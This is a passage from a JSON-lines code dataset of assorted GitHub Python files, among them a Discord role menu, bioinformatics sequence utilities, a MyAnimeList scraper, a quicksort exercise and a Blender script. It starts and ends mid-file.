user_has_requested_role = interaction_user.get_role(requested_role.id) is not None\n if user_has_requested_role:\n await interaction_user.remove_roles(requested_role)\n await interaction.response.edit_message(content=\"Role removed! You can now dismiss this message.\", view=self)\n else:\n await interaction_user.add_roles(requested_role)\n await interaction.response.edit_message(content=\"Role added! You can now dismiss this message.\", view=self)\n \n # Code to be executed when choosing a role on the pronoun role menu \n async def on_pronoun_button_click(self, button: MiscRoleButton, interaction: Interaction):\n self.clear_items()\n interaction_user = interaction.user\n requested_role = interaction.guild.get_role(button.role_id)\n user_has_requested_role = interaction_user.get_role(requested_role.id) is not None\n if user_has_requested_role:\n await interaction_user.remove_roles(requested_role)\n await interaction.response.edit_message(content=\"Role removed! You can now dismiss this message.\", view=self)\n else:\n await interaction_user.add_roles(requested_role)\n await interaction.response.edit_message(content=\"Role added! 
You can now dismiss this message.\", view=self)\n \n # Code to be executed when choosing a role on the fluency level menu \n async def on_fluencylevel_button_click(self, button: FluencyLevelButton, interaction: Interaction):\n self.clear_items()\n interaction_user = interaction.user\n requested_role = interaction.guild.get_role(button.role_id)\n user_has_requested_role = interaction_user.get_role(requested_role.id) is not None\n\n # Clears any previously assigned fluency level roles from the user \n # This prevents them having two fluency level roles\n async def clear_roles():\n await interaction_user.remove_roles(\n discord.Object(fluency_levels[0].role_id),\n discord.Object(fluency_levels[1].role_id),\n discord.Object(fluency_levels[2].role_id),\n discord.Object(fluency_levels[3].role_id)\n )\n\n await clear_roles()\n # Assigns requested role to the user and sends a confirmation message\n if user_has_requested_role:\n await interaction.response.edit_message(content=\"Role removed! You can now dismiss this message.\", view=self)\n else:\n await interaction_user.add_roles(requested_role)\n await interaction.response.edit_message(content=\"Role added! You can now dismiss this message.\", view=self)\n\n # Code to be executed when a page change button is clicked\n # Goes to the next or previous page\n async def on_pagechange_button_click(self, button: PageChangeButton, interaction: Interaction):\n if button.label == \"Next Page\":\n self.nativelanguages_dropdown.next_page()\n elif button.label == \"Prev Page\":\n self.nativelanguages_dropdown.prev_page()\n # Displays the next or previous page\n self.refresh_page_change_buttons(self.nativelanguages_dropdown.slice_start, self.nativelanguages_dropdown.slice_end)\n await interaction.response.edit_message(content=\"Select your native language...\", view=self)\n \n # Refreshes the menu depending on the page selected\n def refresh_page_change_buttons(self, slice_start: int, slice_end: int):\n for button in self.pagechange_buttons:\n button.refresh(slice_start, slice_end)\n","repo_name":"sbeve72/rel-bot","sub_path":"main/views/roles_view/roles_view.py","file_name":"roles_view.py","file_ext":"py","file_size_in_byte":7899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"40250666677","text":"width = 15\nuserWidth = 5\n\nmessages = [[1, \"Hello how r u\"], [2, \"good ty\"], [2, \"u\"], [1, \"me too bro\"]]\n# messages = [[1, \"Hello how r u\"], [2, \"good ty\"], [2, \"u here me\"], [1, \"me too bro\"]]\n\nclosers = \"+\" + \"*\"*width + \"+\"\nborder = \"|\"\ndef solve(message):\n side, msg = message\n result = []\n words = msg.split()\n row = [words[0]]\n curr = len(words[0])\n for idx, word in enumerate(words[1:]):\n if curr + len(word) + 1 <= userWidth:\n row.append(word)\n curr += len(word) + 1\n else:\n if side == 1:\n aft = \" \" * (width-curr+1)\n row.append(aft)\n else:\n bef = \" \" * (width-curr+1)\n row = [bef] + row\n x = \" \".join(row)\n result.append(\"|\"+x+\"|\")\n curr = len(word)\n row = [word]\n\n if side == 1:\n aft = \" \" * (width-curr+1)\n row.append(aft)\n else:\n bef = \" \" * (width-curr+1)\n row = [bef] + row\n x = \" \".join(row)\n result.append(\"|\"+x+\"|\")\n return result\n\nans = []\nans.append(closers)\nfor item in messages:\n n = solve(item)\n if not n: continue\n for el in n:\n ans.append(el)\nans.append(closers)\nfor r in ans:\n print(r)\n\n['+***************+', \n'|Hello |', \n'|how r |', \n'|u |', \n'| good|', \n'| ty|', \n'| u|', \n'|me |', \n'|too |', 
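# note: this bare list and the one below read as pasted expected outputs for the two sample message sets; they evaluate as no-op literals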
\n'|bro |', \n'+***************+']\n\n['+***************+', \n'|Hello |', \n'|how r |', \n'|u |', \n'| good|', \n'| ty|', \n'| u|', \n'| here|', \n'| me|', \n'|me |', \n'|too |', \n'|bro |', \n'+***************+']","repo_name":"Naboni/Competitive-Programming","sub_path":"OA/oa10.py","file_name":"oa10.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29685398471","text":"#! /usr/bin/env python3\n\nclass Sequence:\n # Detect the type of sequence this is\n def detect_type(seq):\n # Check to see if this seq is only ACGT\n count = seq.count(\"A\") + seq.count(\"C\") + seq.count(\"G\") + seq.count(\"T\")\n\n return \"N\" if count == len(seq) else \"P\"\n\n def get_aa():\n # Obtained from https://stackoverflow.com/questions/19521905/translation-dna-to-protein\n return {\n 'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',\n 'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',\n 'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',\n 'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',\n 'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',\n 'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',\n 'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',\n 'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',\n 'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',\n 'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',\n 'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',\n 'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',\n 'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',\n 'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',\n 'TAC':'Y', 'TAT':'Y', 'TAA':'*', 'TAG':'*',\n 'TGC':'C', 'TGT':'C', 'TGA':'*', 'TGG':'W',\n }\n\n # Perform the reverse complement on a nucleotide sequence\n def rev_comp(seq):\n ret_seq = \"\"\n rev_lookup = {'A':'T', 'C':'G', 'G':'C', 'T':'A'}\n\n for nuc in seq[::-1]:\n ret_seq += rev_lookup.get(nuc, '')\n\n return ret_seq\n\n # Translate the sequence on the specified frame\n def translate_frame(seq, frame):\n ret_protein = \"\"\n aa_lookup = Sequence.get_aa()\n\n # Frames 0-2 fwd, 3-5 rev\n strand = seq if frame < 3 else Sequence.rev_comp(seq)\n\n # Start on the requested frame, and skip a codons length each time\n for pos in range(frame % 3, len(strand), 3):\n codon = strand[pos:pos+3]\n\n if codon not in aa_lookup:\n ret_protein += \"X\"\n else:\n ret_protein += aa_lookup[codon]\n\n return ret_protein\n\n def __init__(self, seq = '', molecule = 'N'):\n # Set sequence (no override necessary)\n self.seq = seq\n self.molecule = molecule\n\n # Perform a type check if nucleotide\n if self.molecule == 'N':\n self.molecule = Sequence.detect_type(self.seq)\n\n # String method returns format \":\"\n def __str__(self):\n return \"{0}:{1}\".format(self.molecule, self.seq)\n\n # Len should return length of sequence\n def __len__(self):\n return len(self.seq)\n\n # Equality checks for same sequence (or translated sequence for N==P)\n def __eq__(self, operand):\n # If not a sequence, return false\n if not isinstance(operand, Sequence):\n return False\n\n if self.molecule == operand.molecule:\n # If the same type, simply compare strings\n return self.seq == operand.seq\n else:\n # If different types, compare translations\n for trans1 in self.translate():\n for trans2 in operand.translate():\n if trans1 == trans2:\n return True\n\n return False\n\n # Addition should create a new sequence that's the concatenation of two\n # sequences of same type, or an empty nucleotide sequence if not\n def __add__(self, operand):\n # If not a sequence, return new empty sequence\n if not isinstance(operand, Sequence):\n 
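# note: Sequence() here defaults to molecule 'N', since detect_type('')\n            # sees a base count of 0 == len 0\n            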
return Sequence()\n\n        # If not same type, return new empty sequence\n        if self.molecule != operand.molecule:\n            return Sequence()\n\n        # Return concatenation of same type\n        return Sequence(self.seq + operand.seq, self.molecule)\n\n    # If nucleotides, translate on all 6 frames. If protein, return as-is\n    def translate(self):\n        ret_list = []\n\n        if self.molecule == 'P':\n            # For proteins, simply return sequence\n            ret_list.append(self.seq)\n        else:\n            # For nucleotides, translate all 6 frames and add to list\n            for frame in range(6):\n                ret_list.append(Sequence.translate_frame(self.seq, frame))\n\n        return ret_list\n\n    # Calculate GC content\n    def gc_content(self):\n        # For proteins, return 0\n        if self.molecule == 'P':\n            return 0\n\n        return (self.seq.count(\"C\") + self.seq.count(\"G\")) / len(self)\n\n# Prompt the user for a list of nucleotide sequences\ndef get_seqs():\n    seq_list = []\n\n    while True:\n        seq = input(\"Enter nucleotide seq: \")\n        if seq == \"\":\n            break\n\n        seq_list.append(Sequence(seq))\n\n    return seq_list\n\n# Count kmers across all Sequence instances in the list\ndef get_kmers(seqs, size):\n    kmers = {}\n\n    for seq in seqs:\n        # Skip protein sequences\n        if seq.molecule == 'P': continue\n\n        # Iterate through the starting position of each kmer and record\n        for pos in range(len(seq) - size + 1):\n            kmer = seq.seq[pos:pos+size]\n            kmers.setdefault(kmer, 0)\n            kmers[kmer] += 1\n\n    return kmers\n\n# Get seqs, and print 3mers, 4mers and 5mers\nseqs = get_seqs()\n\nprint(get_kmers(seqs, 3))\nprint(get_kmers(seqs, 4))\nprint(get_kmers(seqs, 5))\n","repo_name":"hillba88/Bioinformatic-Programming","sub_path":"hw5-5.py","file_name":"hw5-5.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73365796854","text":"import datetime\nimport re\nfrom io import BytesIO\nfrom typing import TypedDict\n\nfrom dateutil import parser\nfrom selectolax.parser import HTMLParser\n\n# assumption: the original file never imports or initialises an HTTP client,\n# yet get_staff_image below calls self.client.get(); requests is used here as\n# a stand-in, so swap in the project's real client if it differs\nimport requests\n\nfrom shinobi.decorators.return_error_decorator import return_on_error\nfrom shinobi.utilities.regex import RegexHelper\nfrom shinobi.utilities.string import StringHelper\n\n\nclass StaffImageDictionary(TypedDict):\n    image: BytesIO\n    mimetype: str\n\n\nclass StaffDictionary(TypedDict):\n    mal_id: str\n    name: str\n    staff_image: StaffImageDictionary\n    given_name: str\n    family_name: str\n    alternate_name: list[str]\n    birthday: datetime.datetime\n    about: str\n\n\nclass StaffParser:\n    def __init__(self, html: str):\n        self.parser = self.get_parser(html)\n        # assumed HTTP client for get_staff_image (see import note above)\n        self.client = requests.Session()\n\n        # Facades\n        self.regex_helper = RegexHelper()\n        self.string_helper = StringHelper()\n\n    @staticmethod\n    def get_parser(html) -> HTMLParser:\n        return HTMLParser(html)\n\n    @property\n    @return_on_error(\"\")\n    def get_staff_url(self) -> str:\n        return self.parser.css_first(\"meta[property='og:url']\").attributes[\"content\"]\n\n    @property\n    @return_on_error(\"\")\n    def get_staff_id(self) -> str:\n        return self.regex_helper.get_id_from_url(self.get_staff_url)\n\n    @property\n    @return_on_error({})\n    def get_staff_image(self) -> StaffImageDictionary:\n        url = self.parser.css_first(\"meta[property='og:image']\").attributes[\"content\"]\n        if url:\n            res = self.client.get(url)\n            return {\n                \"image\": BytesIO(res.content),\n                \"mimetype\": url.split(\".\")[-1],\n            }\n\n    @property\n    @return_on_error(\"\")\n    def get_staff_name(self) -> str:\n        return self.parser.css_first(\"meta[property='og:title']\").attributes[\"content\"]\n\n    @property\n    @return_on_error(\"\")\n    def get_staff_about(self) -> str:\n        return 
self.parser.css_first(\n \"div#content table tr td.borderClass .people-informantion-more\"\n ).text()\n\n @property\n @return_on_error(\"\")\n def get_staff_family_name(self) -> str:\n node = self.parser.css_first(\"#content table tr td.borderClass\")\n matches = node.select(\"span\").text_contains(\"Family name:\").matches\n if len(matches) > 1:\n raise ValueError(\"There are more than one node in family name node\")\n\n # MAL screwed up the HTML here\n html_match = re.search(\n r\"Family name:(.*?)(Alternate names|Birthday|Website|Member Favorites|More)\",\n matches[0].parent.text(),\n )\n family_name = self.string_helper.cleanse(html_match.group(1))\n # MyAnimeList has it Empty in places\n # raise AttributeError so we can return None\n if not family_name:\n raise AttributeError(\"Can't find family name using regex\")\n\n return family_name\n\n @property\n @return_on_error(\"\")\n def get_staff_given_name(self) -> str:\n node = self.parser.select(\"span\").text_contains(\"Given name:\").matches\n if len(node) > 1:\n raise ValueError(\"There are more than one node in given name node\")\n\n given_name = self.string_helper.cleanse(node[0].next.text())\n if not given_name:\n raise AttributeError(\"Can't find given name\")\n\n return given_name\n\n @property\n @return_on_error([])\n def get_staff_alternate_name(self) -> str:\n node = self.parser.css_first(\"div#content table tr td.borderClass\")\n matches = node.select(\"div span\").text_contains(\"Alternate names:\").matches\n\n if len(matches) > 1:\n raise ValueError(\"There are more than one node in alternate name node\")\n\n names = matches[0].next.text().split(\",\")\n alternate_name = [self.string_helper.cleanse(name) for name in names]\n\n return alternate_name\n\n @property\n @return_on_error(\"\")\n def get_staff_birthday(self) -> str:\n node = self.parser.css_first(\"div#content table tr td.borderClass\")\n matches = node.select(\"div span\").text_contains(\"Birthday:\").matches\n if len(matches) > 1:\n raise ValueError(\"There are more than one node in birthday node\")\n\n birthday = parser.parse(self.string_helper.cleanse(matches[0].next.text()))\n return birthday\n\n def build_dictionary(self) -> StaffDictionary:\n dictionary: StaffDictionary = {\n \"mal_id\": self.get_staff_id,\n \"name\": self.get_staff_name,\n \"given_name\": self.get_staff_given_name,\n \"family_name\": self.get_staff_family_name,\n \"alternate_name\": self.get_staff_alternate_name,\n \"birthday\": self.get_staff_birthday,\n \"about\": self.get_staff_about,\n \"staff_image\": self.get_staff_image,\n }\n return dictionary\n","repo_name":"baseplate-admin/CoreProject","sub_path":"backend/shinobi/parser/staff.py","file_name":"staff.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"21"} +{"seq_id":"36474595321","text":"from Enums import SNR\nfrom create_data import create_data\nfrom evaluation import calculate_hter, plot_confusion_matrix, predict, average_of_neighbors\nfrom model import create_rgb_model\nfrom train import train\n\nif __name__ == '__main__':\n path_data = './QUT-NOISE-TIMIT/'\n snr = SNR.FIVE\n path_save = \"./rgb_spectrograms/\"\n x_train, y_train, x_test, y_test, frames, frames_test = create_data(path_data, path_save, snr, recreate=False)\n\n model = create_rgb_model()\n model = train(model, x_train, y_train, epochs=5)\n\n # Evaluate\n predictions = predict(model, x_test)\n cf_matrix = plot_confusion_matrix(predictions, y_test, percentage=False)\n\n hter, 
mr, far = calculate_hter(cf_matrix)\n\n    print(f'The HTER is {hter}% for SNR {snr.value}, with MR being {mr} and FAR being {far}')\n\n    # Post-processing\n    predictions_post_processing = average_of_neighbors(predictions, 5)\n    cf_matrix = plot_confusion_matrix(predictions_post_processing, y_test, percentage=False)\n\n    hter, mr, far = calculate_hter(cf_matrix)\n\n    print(f'The post-processed HTER is {hter}% for SNR {snr.value}, with MR being {mr} and FAR being {far}')\n","repo_name":"nadbot/Exploring-Convolutional-Neural-Networks-for-Voice-Activity-Detection","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72905130293","text":"print(\"Area of rectangle [Calculator]\\n\")\n#asks the user what the width of the rectangle is. (float)\nwidth = float(input(\"Width: \"))\n#asks the user what the height of the rectangle is. (float)\nheight = float(input(\"Height: \"))\n#calculates area (renamed from 'sum', which shadowed the built-in)\narea = (width * height)\n#prints the calculated answer in 2 decimal places\nprint(\"\\nArea of Rectangle:\", round(area, 2))\n#makes sure the user clicks enter before the \"console\" closes. this allows them to see the answer instead of the console closing instantly\ninput()","repo_name":"JacProsser/college","sub_path":"Assignment 1 - Procedural Programming/Python Challenges (1-30)/Challenge 3.py","file_name":"Challenge 3.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1125838029","text":"import bpy\nimport bmesh\n\n#define function that will deselect every other vert from all verts selected\ndef checkered_deselect(obj, bm):\n    selected_verts = [v for v in bm.verts if v.select]\n    for i, vert in enumerate(selected_verts):\n        if i % 2 == 1:\n            vert.select = False\n    bm.select_flush(False)\n\nobj = bpy.context.object\nif obj and obj.type == 'MESH':\n    bpy.ops.object.mode_set(mode='EDIT')\n    bm = bmesh.from_edit_mesh(obj.data)\n    checkered_deselect(obj, bm)\n    bmesh.update_edit_mesh(obj.data)\nelse:\n    print(\"Please select a mesh object.\")\n\n#space out the verts (requires looptools addon)\nbpy.ops.mesh.looptools_space(influence=100, input='selected', interpolation='cubic', lock_x=False, lock_y=False, lock_z=False)\n","repo_name":"LeoFdAguiar/LFdA-Blender-Scripts","sub_path":"checkered-deselect-islands.py","file_name":"checkered-deselect-islands.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28008027534","text":"from scipy.io import netcdf\nimport cartopy.crs as ccrs\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport os\nimport xarray as xr\nfrom sif_utils import plot_histogram\n\nDATA_DIR = \"/mnt/beegfs/bulk/mirror/jyf6/datasets\"\nFILE_PATH = os.path.join(DATA_DIR, 'FLDAS/FLDAS_NOAH01_C_GL_M.A201808.001.nc.SUB.nc4')\nSTART_DATE = '2018-08-01'\nEND_DATE = '2018-08-16'\nPLOT_FOLDER = './exploratory_plots/FLDAS'\n\nif not os.path.exists(PLOT_FOLDER):\n    os.makedirs(PLOT_FOLDER)\n\n\ndataset = xr.open_dataset(FILE_PATH)\n\n# Variables: Rainf_f_tavg, Rainf_f_tavg, Rainf_f_tavg\nprint(\"======================================================\")\nprint(\"Dataset variables:\", dataset)\nprint(\"======================================================\")\n\n# Plot the distribution of rainfall (across all time/space)\n# all_rainfall = 
dataset.Rainf_f_tavg.values.flatten()\n# all_rainfall = all_rainfall[~np.isnan(all_rainfall)]\n# n, bins, patches = plt.hist(all_rainfall, 100, facecolor='blue', alpha=0.5)\n# plt.title('Temp values: August 1-16, 2018')\n# plt.xlabel('Temp')\n# plt.ylabel('Number of pixels')\n\n# plt.savefig(os.path.join(PLOT_FOLDER, 'all_temp.png'))\n# plt.close()\n\n# data_array = dataset.dcSIF.sel(time=START_DATE)\n# # bfill('time', 10)\n# # SIF should never be negative, so replace any negatives or NaN with 0\n# data_array = data_array.fillna(0)\n# data_array = data_array.where(data_array >= 0, 0)\n# print(data_array)\n\n\n# Select date range\ndata_array = dataset.Rainf_f_tavg.sel(time=slice(START_DATE, END_DATE)).mean(dim='time')\nprint(\"Temp array shape\", data_array.shape)\nprint(\"Array\", data_array)\n\n# Interpolate to higher resolution\nnew_lat = np.linspace(38, 48.7, 1000)\nnew_lon = np.linspace(-108, -82, 1000)\nreprojected_fldas_dataset = dataset.interp(X=new_lon, Y=new_lat).mean(dim='time')\ninterpolated_temps = reprojected_fldas_dataset.Rainf_f_tavg\n\n# Compute the min/max values for plotting\ninterpolated_values = interpolated_temps.values.flatten()\ninterpolated_values = interpolated_values[~np.isnan(interpolated_values)]\nplot_histogram(interpolated_values, \"FLDAS/Rainf_f_tavg_region_histogram.png\", title=\"Rainf_f_tavg\")\nmin_value = np.min(interpolated_values)\nmax_value = np.max(interpolated_values)\n\n# Plot uninterpolated data\nplt.figure(figsize=(21,9))\ncolor_map = plt.get_cmap('Blues')\nax = plt.axes(projection=ccrs.PlateCarree())\nax.set_global()\ndata_array.plot.pcolormesh(ax=ax, transform=ccrs.PlateCarree(), x='X', y='Y', vmin=min_value,\n vmax=max_value, cmap=color_map)\nax.coastlines()\nplt.title('Rainf_f_tavg, average from ' + START_DATE + ' to ' + END_DATE)\nplt.savefig(os.path.join(PLOT_FOLDER, 'Rainf_f_tavg_' + START_DATE + '_to_' + END_DATE + '_global.png'))\nplt.close()\n\n# Plot interpolated data\nplt.figure(figsize=(21,9))\nax = plt.axes(projection=ccrs.PlateCarree())\nax.set_global()\ninterpolated_temps.plot.pcolormesh(ax=ax, transform=ccrs.PlateCarree(), x='X', y='Y', vmin=min_value,\n vmax=max_value, cmap=color_map)\nax.coastlines()\nplt.title('(INTERPOLATED) Rainf_f_tavg, average from ' + START_DATE + ' to ' + END_DATE)\nplt.savefig(os.path.join(PLOT_FOLDER, 'Rainf_f_tavg_INTERPOLATED_' + START_DATE + '_to_' + END_DATE + '_global.png'))\nplt.close()\n\n\n\n\n# Example: get value at specific lat/long\nprint(\"Value at 100W, 45N:\", data_array.sel(Y=40.95, X=-100.15, method='nearest'))\n","repo_name":"joshuafan/Vegetation_SIF_Downscaling_CSSUNet","sub_path":"old_files_2/process_fldas_files.py","file_name":"process_fldas_files.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33350007167","text":"import cv2\n\ngst_str_rtp = \"appsrc ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000\"\nfourcc = cv2.VideoWriter_fourcc(*'H264')\nmanda = \"sout=#rtp{dst=127.0.0.1,port=5000,mux=ts}\"\nHOST = '127.0.0.1'\nPORT = 5000\nfps = 30.\nframe_width = 1280\nframe_height = 720\nprint(cv2.getBuildInformation())\n\nclass Streamto(object):\n def __init__(self):\n # Using OpenCV to capture from device 0. 
If you have trouble capturing\n # from a webcam, comment the line below out and use a video file\n # instead.\n self.video = cv2.VideoWriter(gst_str_rtp, 0, fps, (frame_width, frame_height), True)\n\n def __del__(self):\n self.video.release()\n\n def send(self, frame):\n self.video.write(frame)\n","repo_name":"bohmax/tirocinio","sub_path":"Sviluppo/0prove/Stream_out.py","file_name":"Stream_out.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38652260785","text":"import unittest\nimport random\nimport sys\nimport math\nimport operator\n\ndebug = False\ncompareCount = 0\n\n# Performs quicksort on a global array (in place)\ndef quicksort(l,r,pivotType='rand'):\n\n global arr\n global compareCount \n global debug \n \n length = r-l+1\n if (length <= 1): return\n\n # add to comparecount\n compareCount += length - 1\n \n pivot = choosePivot(l,r,pivotType)\n pivotVal = arr[pivot]\n [left,right] = partition(l,r,pivot)\n \n lengthLeft = left[1]-left[0]+1\n lengthRight = right[1]-right[0]+1\n\n if (lengthLeft > 0):\n quicksort(left[0],left[1],pivotType)\n \n if (lengthRight > 0):\n quicksort(right[0],right[1],pivotType)\n\n return arr\n\ndef partition(l,r,p):\n \n global arr\n \n # Swap pivot to first position\n pivotVal = swapPivot(l,p)\n\n i = l+1\n for j in range(l+1,r+1):\n if (arr[j] < pivotVal):\n # Swap first element known to be larger with the current\n current = arr[j]\n firstLarge = arr[i]\n arr[i] = current\n arr[j] = firstLarge\n # Increment divider between smaller and larger sections\n i += 1\n\n # Swap pivot into correct place\n lastSmall = arr[i-1]\n arr[i-1] = pivotVal\n arr[l] = lastSmall\n\n # Build arrays with pointers\n left = [l,i-2]\n right = [i,r]\n return [left,right]\n\n# Swap pivot element with first of array section\ndef swapPivot(l,p):\n global arr\n pivotVal = arr[p]\n firstVal = arr[l]\n arr[l] = pivotVal\n arr[p] = firstVal\n return pivotVal\n\n# Choose the pivot based on the type\ndef choosePivot(l,r, pivotType='first'):\n global arr\n global debug\n if (pivotType == 'first'):\n return l\n elif (pivotType == 'last'):\n return r\n elif (pivotType == 'med3'):\n middle = l + math.floor((r-l)/2)\n three = [(l,arr[l]),(middle,arr[middle]),(r,arr[r])]\n three.sort(key = operator.itemgetter(1))\n return three[1][0]\n else:\n return random.randrange(l,r+1)\n\n#========= Test Cases =========#\n\n### Actual Assignment input\ntext_file = open(\"./ex3input.txt\", \"r\")\narr = text_file.read().splitlines()\nfor i in range(len(arr)):\n arr[i] = int(arr[i])\nsys.setrecursionlimit(max(sys.getrecursionlimit(), len(arr)+10000))\nsortedArr = quicksort(0,len(arr)-1,'med3')\nprint(sortedArr)\nprint('compareCount '+str(compareCount))\n### first comparecount 162085\n### last comparecount 164123\n### med3 comparecount 138382\n\n\n### large test case\n# text_file = open(\"./ex3testcases/input_dgrcode_16_100000.txt\", \"r\")\n# arr = text_file.read().splitlines()\n# for i in range(len(arr)):\n# arr[i] = int(arr[i])\n# sys.setrecursionlimit(max(sys.getrecursionlimit(), len(arr)+10000))\n# sortedArr = quicksort(0,len(arr)-1,'med3')\n# print(sortedArr)\n# print('compareCount '+str(compareCount))\n### first should be 2127173 => 2127173\n### last should be 2079088 => 2079088\n### med3 should be 1749103 => 1749103\n\n### small test case\n# text_file = open(\"./ex3testcases/input_dgrcode_15_20.txt\", \"r\")\n# arr = text_file.read().splitlines()\n# for i in range(len(arr)):\n# arr[i] = 
int(arr[i])\n# sys.setrecursionlimit(max(sys.getrecursionlimit(), len(arr)+10000))\n# sortedArr = quicksort(0,len(arr)-1,'med3')\n# print(sortedArr)\n# print('compareCount '+str(compareCount))\n### first should be 69 => 69\n### last should be 65 => 65\n### med3 should be 56 => 56\n\n\n### small test case\n# text_file = open(\"./ex3testcases/input_dgrcode_10_10.txt\", \"r\")\n# arr = text_file.read().splitlines()\n# for i in range(len(arr)):\n# arr[i] = int(arr[i])\n# sys.setrecursionlimit(max(sys.getrecursionlimit(), len(arr)+10000))\n# sortedArr = quicksort(0,len(arr)-1,'med3')\n# print(sortedArr)\n# print('compareCount '+str(compareCount))\n### first should be 21 => 21\n### last should be 22 => 22\n### med3 should be 20 => 20\n\n# class TestQuicksort(unittest.TestCase):\n# def test(self):\n# self.assertEqual(quicksort([4,5,9,4,10,6,5,3,7,8,3,7,1,2,5,7,3,2,1],False,False,'first'),[1,1,2,2,3,3,3,4,4,5,5,5,6,7,7,7,8,9,10])\n# theTest = TestQuicksort()\n# theTest.test()\n\n\n\n","repo_name":"jqlee85/algorithms","sub_path":"src/coursera/divide-and-conquer/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26436664126","text":"import sys\nimport re\n\ndef humanise_asserts(line):\n prologue = '\\tassert(1 && '\n epilogue = ' );\\n'\n assert line.startswith(prologue)\n assert line.endswith(epilogue)\n line = line[len(prologue):-len(epilogue)]\n asserts = line.split(' && ')\n return ['\\tassert({0});\\n'.format(a) for a in asserts]\n\ndef arithmetic_target(value):\n return 'AT_{0}'.format(\n 'BOTH' if value == 0 else (\n 'SOURCE_ONLY' if value == 1 else (\n 'DEST_ONLY' if value == 2 else (\n 'ERROR'))))\n\ndef int_to_macro(instruction):\n opcode = instruction >> 28\n reg = (instruction >> 26) & 3\n value = instruction & 0x3FFFFFF\n if opcode == 0:\n return 'DMA_OP_SET(LOOP_REG_{0}, {1})'.format(reg, value)\n elif opcode == 1:\n return 'DMA_OP_LOOP(LOOP_REG_{0}, {1})'.format(reg, value)\n elif opcode == 2:\n transfer_size = 8 * (1 << ((instruction >> 25) & 0x7))\n return 'DMA_OP_TRANSFER(TS_BITS_{0})'.format(transfer_size)\n elif opcode == 4:\n return 'DMA_OP_ADD({0}, {1})'.format(arithmetic_target(reg), value)\n elif opcode == 5:\n return 'DMA_OP_SUB({0}, {1})'.format(arithmetic_target(reg), value)\n elif opcode == 6:\n return 'DMA_OP_STOP'\n else:\n assert False\n\ndef match_to_macro(match):\n return int_to_macro(int(match.group(0), 16))\n\ndef humanise_programs(line):\n line = line.replace('{', '{\\n').replace('}', '\\n}').replace(',', ',\\n\\t')\n line = re.sub('0x[0-9a-f]{8}', match_to_macro, line)\n return line\n\ndef main():\n new_file = []\n with open(sys.argv[1]) as test_file:\n for line in test_file:\n def first_is(match):\n return line.strip().startswith(match)\n\n if first_is('assert(1 &&'):\n new_file.extend(humanise_asserts(line))\n elif (first_is('*((volatile uint8_t *)') or\n first_is('add_tlb_mapping')):\n new_file.append(line.replace(';', ';\\n\\t'))\n elif line.strip().startswith('dma_instruction *dma_program[]'):\n new_file.append(humanise_programs(line))\n else:\n new_file.append(line)\n\n with open(sys.argv[1], 'w') as test_file:\n test_file.write(''.join(new_file))\n\nif __name__ == '__main__':\n 
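# a quick self-check of the instruction decoding above (a hedged sketch,\n    # safe to delete): 0x24000000 has opcode 2 (transfer) and size bits 2,\n    # i.e. a transfer size of 8 * (1 << 2) = 32\n    assert int_to_macro(0x24000000) == 'DMA_OP_TRANSFER(TS_BITS_32)'\n    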
main()\n","repo_name":"CTSRD-CHERI/beri","sub_path":"cheritest/trunk/fuzz_dma/humanise_test.py","file_name":"humanise_test.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"10844826774","text":"import sys\nn, m, b = map(int, sys.stdin.readline().rstrip().split())\ndata = [list(map(int, sys.stdin.readline().rstrip().split())) for _ in range(n)]\na = []\nresult = []\nfor i in data: a += i\nfor i in range(min(a), max(a) + 1):\n    sec = 0\n    b_save = b\n    for j in data:\n        for k in j:\n            if i > k:\n                sec += i - k\n                b_save -= i - k\n            elif i < k:\n                sec += (k - i) * 2\n                b_save += k - i\n    if b_save >= 0:\n        result.append((sec, i))\nresult = sorted(result, key=lambda a:a[0])\nnow = result[0]\nfor i in range(1, len(result)):\n    if now[0] != result[i][0]:\n        break\n    if now[1] < result[i][1]:\n        now = result[i]\nprint(' '.join([str(i) for i in 